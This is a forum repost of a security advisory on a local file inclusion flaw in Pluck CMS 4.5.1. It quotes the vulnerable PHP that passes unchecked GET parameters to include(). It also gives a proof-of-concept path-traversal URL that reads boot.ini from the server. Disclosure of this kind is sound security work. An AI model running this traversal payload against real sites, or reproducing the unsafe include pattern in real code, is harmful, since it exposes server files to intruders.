• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 登录 立即注册
    • 切换风格
    快捷导航
    福建二哥 门户 查看主题

    Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:49| 查看数: 36| 评论数: 0|帖子模式

    ########################## www.BugReport.ir #########################
    #
    #      AmnPardaz Security Research Team
    #
    # Title: Pluck Local File inclusion
    # Vendor: http://www.pluck-cms.org
    # Bug: Local File Inclusion
    # Vulnerable Version: 4.5.1 (prior versions also may be affected)
    # Exploitation: Remote with browser
    # Fix: N/A
    ###################################################################
    ####################
    - Description:
    ####################Pluck is a content management system, written in php.
    ####################
    - Vulnerability:
    #################### --> Local File InclusionInput passed to multiple parameters in "predefined_variables.php" are not properly verified
    before being used to include files.
    This can be exploited to include arbitrary files from local resources.Code Snippet:
    /data/inc/themes/predefined_variables.php #line:15-38//Include Translation data
    include ("data/settings/langpref.php");
    include ("data/inc/lang/$langpref");
    //Get Site-title
    $sitetitle = file_get_contents("data/settings/title.dat");//Get the page-data
    $filetoread = $_GET['file'];
    $album = $_GET['album'];
    $blogpost = $_GET['blogpost'];
    $cat = $_GET['cat'];if (($filetoread) && (file_exists("data/content/$filetoread"))) {
    include "data/content/$filetoread"; }elseif ($album) {
    $title = $album; }elseif ($blogpost) {
    include("data/blog/$cat/posts/$blogpost"); }elseif ((!file_exists("data/content/$filetoread")) && (!$album) && (!$blogpost)) {
    $title = $lang_front1;
    $content = $lang_front2; }
    POC: http://localhost/pluck-4_5_1/data/inc/themes/predefined_variables.php?blogpost=../../../../../../../../boot.ini####################
    - Credit :
    ####################
    AmnPardaz Security Research Team
    Contact: admin[4t}bugreport{d0t]ir
    www.BugReport.ir
    www.AmnPardaz.comz

    来源:https://www.jb51.net/hack/5688.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    新人须知

    常见问题

    维权申诉

    关注微博

    扫描微信

    关于合作

    通讯联系

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表